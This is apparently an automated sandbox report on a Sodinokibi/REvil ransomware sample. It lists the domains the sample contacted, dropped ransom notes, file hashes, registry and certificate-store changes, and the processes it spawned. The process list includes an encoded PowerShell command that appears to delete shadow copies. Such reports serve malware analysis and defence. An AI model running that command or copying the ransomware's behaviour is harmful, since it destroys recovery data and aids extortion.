US 8.8.8.8:53 130.32.184.91.in-addr.arpa udp
US 8.8.8.8:53 ralister.co.uk udp
US 172.67.182.43:443 ralister.co.uk tcp
US 8.8.8.8:53 www.ralister.co.uk udp
US 104.21.91.244:443 www.ralister.co.uk tcp
US 8.8.8.8:53 43.182.67.172.in-addr.arpa udp
US 8.8.8.8:53 244.91.21.104.in-addr.arpa udp
US 8.8.8.8:53 eraorastudio.com udp
US 198.54.115.34:443 eraorastudio.com tcp
US 8.8.8.8:53 antiaginghealthbenefits.com udp
US 107.178.223.183:443 antiaginghealthbenefits.com tcp
US 8.8.8.8:53 hashkasolutindo.com udp
US 8.8.8.8:53 spsshomeworkhelp.com udp
US 172.67.216.165:443 spsshomeworkhelp.com tcp
US 8.8.8.8:53 34.115.54.198.in-addr.arpa udp
US 8.8.8.8:53 183.223.178.107.in-addr.arpa udp
US 8.8.8.8:53 www.spsshomeworkhelp.com udp
US 104.21.45.163:443 www.spsshomeworkhelp.com tcp
US 104.21.45.163:443 www.spsshomeworkhelp.com tcp
US 8.8.8.8:53 165.216.67.172.in-addr.arpa udp
DE 18.156.169.48:443 parkcf.nl tcp
US 8.8.8.8:53 163.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 rosavalamedahr.com udp
US 35.215.118.92:443 rosavalamedahr.com tcp
US 8.8.8.8:53 48.169.156.18.in-addr.arpa udp
US 8.8.8.8:53 92.118.215.35.in-addr.arpa udp
US 8.8.8.8:53 worldhealthbasicinfo.com udp
US 8.8.8.8:53 new.devon.gov.uk udp
US 162.159.135.42:443 new.devon.gov.uk tcp
US 8.8.8.8:53 42.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 www.devon.gov.uk udp
US 192.124.249.120:443 www.devon.gov.uk tcp
US 8.8.8.8:53 micro-automation.de udp
DE 185.237.67.60:443 micro-automation.de tcp
US 8.8.8.8:53 120.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 www.micro-automation.com udp
US 8.8.8.8:53 60.67.237.185.in-addr.arpa udp
DE 185.237.67.60:443 www.micro-automation.com tcp
US 8.8.8.8:53 justinvieira.com udp
US 35.215.80.52:443 justinvieira.com tcp
US 8.8.8.8:53 52.80.215.35.in-addr.arpa udp
US 8.8.8.8:53 live-con-arte.de udp
DE 138.201.193.58:443 live-con-arte.de tcp
US 8.8.8.8:53 jiloc.com udp
US 8.8.8.8:53 58.193.201.138.in-addr.arpa udp
GB 169.197.114.138:443 jiloc.com tcp
US 8.8.8.8:53 138.114.197.169.in-addr.arpa udp
US 8.8.8.8:53 www.jiloc.com udp
GB 169.197.114.138:443 www.jiloc.com tcp
US 8.8.8.8:53 corona-handles.com udp
FR 188.165.23.19:443 corona-handles.com tcp
US 8.8.8.8:53 19.23.165.188.in-addr.arpa udp

Files

memory/1648-2-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-4-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-14-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-12-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-10-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-8-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-6-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-16-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-1-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-18-0x0000000000560000-0x0000000000580000-memory.dmp

memory/3620-19-0x00007FFD6CD23000-0x00007FFD6CD25000-memory.dmp

memory/3620-20-0x00000251E17E0000-0x00000251E1802000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m1hxdjrm.wbp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3620-30-0x00007FFD6CD20000-0x00007FFD6D7E1000-memory.dmp

memory/3620-31-0x00007FFD6CD20000-0x00007FFD6D7E1000-memory.dmp

memory/3620-34-0x00007FFD6CD20000-0x00007FFD6D7E1000-memory.dmp

memory/1648-35-0x0000000000560000-0x0000000000580000-memory.dmp

C:\Users\w7ld957-readme.txt

MD5 a42276028ce4ad5c81c692d06ee361cb
SHA1 fbed8d404bdca891fa177daa8c5918ac7b82b8b7
SHA256 d9d210920a89d8e622d077a59920fc4c914ee90f724cb8085e7a1744a3c90109
SHA512 d3eb66eedeebe31e7370bd34a01b8082218e70f9c625ad12d6dbee13ba0165f8ee50f6b128a4d3a91f426e5b5057287de7953f8cf1e0ab3e34c8f7175bc7f6e5

memory/1648-181-0x0000000000400000-0x0000000000454000-memory.dmp

memory/1648-458-0x0000000000560000-0x0000000000580000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-23 21:39

Reported

2024-12-23 21:42

Platform

win7-20241010-en

Max time kernel

140s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe"

Signatures

Sodin,Sodinokibi,REvil

ransomware sodinokibi

Sodinokibi family

sodinokibi

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\56u5ii.bmp" C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files\SetSkip.wmv C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\InvokeRemove.search-ms C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\MeasureProtect.mp3 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\OutWait.pptm C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\CompressUnprotect.html C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SaveSwitch.gif C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SkipSend.iso C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\UnlockLock.vsd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\WatchStep.avi C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\RegisterStart.i64 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ResolveSave.scf C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SelectMeasure.wm C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\CopyResolve.zip C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files (x86)\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\AssertUnblock.ini C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\AssertUnprotect.midi C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\EnterUnregister.xml C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SuspendInitialize.wvx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\UninstallGet.dib C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ClearConfirm.3gp2 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SyncJoin.dwfx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\CopyConvertTo.M2TS C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\UninstallExpand.ttc C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files (x86)\microsoft sql server compact edition\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\FormatRemove.dib C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\MergeBackup.7z C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\StartConvertTo.jpe C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\CloseCheckpoint.vbe C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\EnterProtect.rle C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\FindSet.m4a C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe

"C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 woodleyacademy.org udp
US 208.69.169.161:443 woodleyacademy.org tcp
US 8.8.8.8:53 bookspeopleplaces.com udp
US 3.234.189.133:443 bookspeopleplaces.com tcp
US 3.234.189.133:443 bookspeopleplaces.com tcp
US 8.8.8.8:53 despedidascostablanca.es udp
FR 46.105.204.5:443 despedidascostablanca.es tcp
FR 46.105.204.5:443 despedidascostablanca.es tcp
US 8.8.8.8:53 lapinvihreat.fi udp
FI 94.237.33.171:443 lapinvihreat.fi tcp
FI 94.237.33.171:443 lapinvihreat.fi tcp
US 8.8.8.8:53 drfoyle.com udp
US 13.248.169.48:443 drfoyle.com tcp
US 13.248.169.48:443 drfoyle.com tcp
US 8.8.8.8:53 carolinepenn.com udp
GB 77.68.103.74:443 carolinepenn.com tcp
GB 77.68.103.74:443 carolinepenn.com tcp
US 8.8.8.8:53 abuelos.com udp
US 50.18.94.53:443 abuelos.com tcp
US 8.8.8.8:53 groupe-frayssinet.fr udp
FR 162.19.75.184:443 groupe-frayssinet.fr tcp
US 8.8.8.8:53 tecnojobsnet.com udp
US 104.21.32.1:443 tecnojobsnet.com tcp
US 104.21.32.1:443 tecnojobsnet.com tcp
US 8.8.8.8:53 deoudedorpskernnoordwijk.nl udp
NL 37.72.99.127:443 deoudedorpskernnoordwijk.nl tcp
NL 37.72.99.127:443 deoudedorpskernnoordwijk.nl tcp
US 8.8.8.8:53 siluet-decor.ru udp
US 8.8.8.8:53 smessier.com udp
US 8.8.8.8:53 calxplus.eu udp
US 8.8.8.8:53 julis-lsa.de udp
DE 185.53.177.20:443 julis-lsa.de tcp
DE 185.53.177.20:443 julis-lsa.de tcp
US 8.8.8.8:53 aminaboutique247.com udp
US 8.8.8.8:53 pier40forall.org udp
US 15.197.148.33:443 pier40forall.org tcp
US 15.197.148.33:443 pier40forall.org tcp
US 8.8.8.8:53 coding-machine.com udp
FR 164.132.235.17:443 coding-machine.com tcp
FR 164.132.235.17:443 coding-machine.com tcp
US 8.8.8.8:53 longislandelderlaw.com udp
US 160.153.0.194:443 longislandelderlaw.com tcp
US 160.153.0.194:443 longislandelderlaw.com tcp
US 8.8.8.8:53 expandet.dk udp
US 104.21.80.1:443 expandet.dk tcp
US 8.8.8.8:53 blogdecachorros.com udp
US 75.2.37.224:443 blogdecachorros.com tcp
US 75.2.37.224:443 blogdecachorros.com tcp
US 8.8.8.8:53 grupocarvalhoerodrigues.com.br udp
US 8.8.8.8:53 the-virtualizer.com udp
FR 5.175.14.53:443 the-virtualizer.com tcp
FR 5.175.14.53:443 the-virtualizer.com tcp
US 8.8.8.8:53 kindersitze-vergleich.de udp
DE 185.159.123.48:443 kindersitze-vergleich.de tcp
US 8.8.8.8:53 edv-live.de udp
DE 202.61.195.82:443 edv-live.de tcp
DE 202.61.195.82:443 edv-live.de tcp
US 8.8.8.8:53 gasbarre.com udp
US 172.67.73.130:443 gasbarre.com tcp
US 8.8.8.8:53 www.gasbarre.com udp
US 172.67.73.130:443 www.gasbarre.com tcp
US 8.8.8.8:53 ulyssemarketing.com udp
US 8.8.8.8:53 thomasvicino.com udp
US 104.21.48.1:443 thomasvicino.com tcp
US 8.8.8.8:53 sevenadvertising.com udp
US 76.223.54.146:443 sevenadvertising.com tcp
US 76.223.54.146:443 sevenadvertising.com tcp
US 8.8.8.8:53 sporthamper.com udp
CA 23.227.38.32:443 sporthamper.com tcp
CA 23.227.38.32:443 sporthamper.com tcp
US 8.8.8.8:53 myhostcloud.com udp
US 104.21.18.89:443 myhostcloud.com tcp
US 8.8.8.8:53 iviaggisonciliegie.it udp
GB 77.95.113.179:443 iviaggisonciliegie.it tcp
GB 77.95.113.179:443 iviaggisonciliegie.it tcp
US 8.8.8.8:53 plastidip.com.ar udp
AR 45.162.169.226:443 plastidip.com.ar tcp
AR 45.162.169.226:443 plastidip.com.ar tcp
US 8.8.8.8:53 zewatchers.com udp
FR 185.100.4.146:443 zewatchers.com tcp
FR 185.100.4.146:443 zewatchers.com tcp
US 8.8.8.8:53 saxtec.com udp
DE 134.255.237.119:443 saxtec.com tcp
DE 134.255.237.119:443 saxtec.com tcp
US 8.8.8.8:53 smale-opticiens.nl udp
NL 217.18.77.142:443 smale-opticiens.nl tcp
NL 217.18.77.142:443 smale-opticiens.nl tcp
US 8.8.8.8:53 haar-spange.com udp
US 8.8.8.8:53 zimmerei-deboer.de udp
DE 91.184.32.130:443 zimmerei-deboer.de tcp
DE 91.184.32.130:443 zimmerei-deboer.de tcp
US 8.8.8.8:53 ralister.co.uk udp
US 104.21.91.244:443 ralister.co.uk tcp
US 8.8.8.8:53 www.ralister.co.uk udp
US 104.21.91.244:443 www.ralister.co.uk tcp
US 8.8.8.8:53 eraorastudio.com udp
US 198.54.115.34:443 eraorastudio.com tcp
US 198.54.115.34:443 eraorastudio.com tcp
US 8.8.8.8:53 antiaginghealthbenefits.com udp
US 104.155.138.21:443 antiaginghealthbenefits.com tcp
US 8.8.8.8:53 hashkasolutindo.com udp
US 8.8.8.8:53 spsshomeworkhelp.com udp
US 104.21.45.163:443 spsshomeworkhelp.com tcp
US 8.8.8.8:53 www.spsshomeworkhelp.com udp
US 172.67.216.165:443 www.spsshomeworkhelp.com tcp
US 172.67.216.165:443 www.spsshomeworkhelp.com tcp
US 8.8.8.8:53 parkcf.nl udp
DE 18.156.169.48:443 parkcf.nl tcp
DE 18.156.169.48:443 parkcf.nl tcp
US 8.8.8.8:53 rosavalamedahr.com udp
US 35.215.118.92:443 rosavalamedahr.com tcp
US 35.215.118.92:443 rosavalamedahr.com tcp
US 8.8.8.8:53 worldhealthbasicinfo.com udp
US 8.8.8.8:53 new.devon.gov.uk udp
US 162.159.135.42:443 new.devon.gov.uk tcp
US 162.159.135.42:443 new.devon.gov.uk tcp
US 8.8.8.8:53 micro-automation.de udp
DE 185.237.67.60:443 micro-automation.de tcp
DE 185.237.67.60:443 micro-automation.de tcp
US 8.8.8.8:53 justinvieira.com udp
US 35.215.80.52:443 justinvieira.com tcp
US 35.215.80.52:443 justinvieira.com tcp
US 8.8.8.8:53 live-con-arte.de udp
DE 138.201.193.58:443 live-con-arte.de tcp
DE 138.201.193.58:443 live-con-arte.de tcp
US 8.8.8.8:53 jiloc.com udp
GB 169.197.114.138:443 jiloc.com tcp
GB 169.197.114.138:443 jiloc.com tcp
US 8.8.8.8:53 corona-handles.com udp
FR 188.165.23.19:443 corona-handles.com tcp
FR 188.165.23.19:443 corona-handles.com tcp
US 8.8.8.8:53 urclan.net udp
DE 104.248.39.236:443 urclan.net tcp
US 8.8.8.8:53 leeuwardenstudentcity.nl udp
FR 15.236.230.5:443 leeuwardenstudentcity.nl tcp
FR 15.236.230.5:443 leeuwardenstudentcity.nl tcp
US 8.8.8.8:53 maureenbreezedancetheater.org udp
US 198.185.159.145:443 maureenbreezedancetheater.org tcp
US 198.185.159.145:443 maureenbreezedancetheater.org tcp
US 8.8.8.8:53 mepavex.nl udp
BE 217.21.184.250:443 mepavex.nl tcp
US 8.8.8.8:53 shiftinspiration.com udp
US 8.8.8.8:53 allentownpapershow.com udp
US 172.67.215.217:443 allentownpapershow.com tcp
US 8.8.8.8:53 skanah.com udp
LU 198.251.89.144:443 skanah.com tcp
LU 198.251.89.144:443 skanah.com tcp
US 8.8.8.8:53 cyntox.com udp
US 199.60.103.16:443 cyntox.com tcp
US 199.60.103.16:443 cyntox.com tcp
US 8.8.8.8:53 wsoil.com.sg udp
MY 185.93.164.201:443 wsoil.com.sg tcp
MY 185.93.164.201:443 wsoil.com.sg tcp
US 8.8.8.8:53 heliomotion.com udp
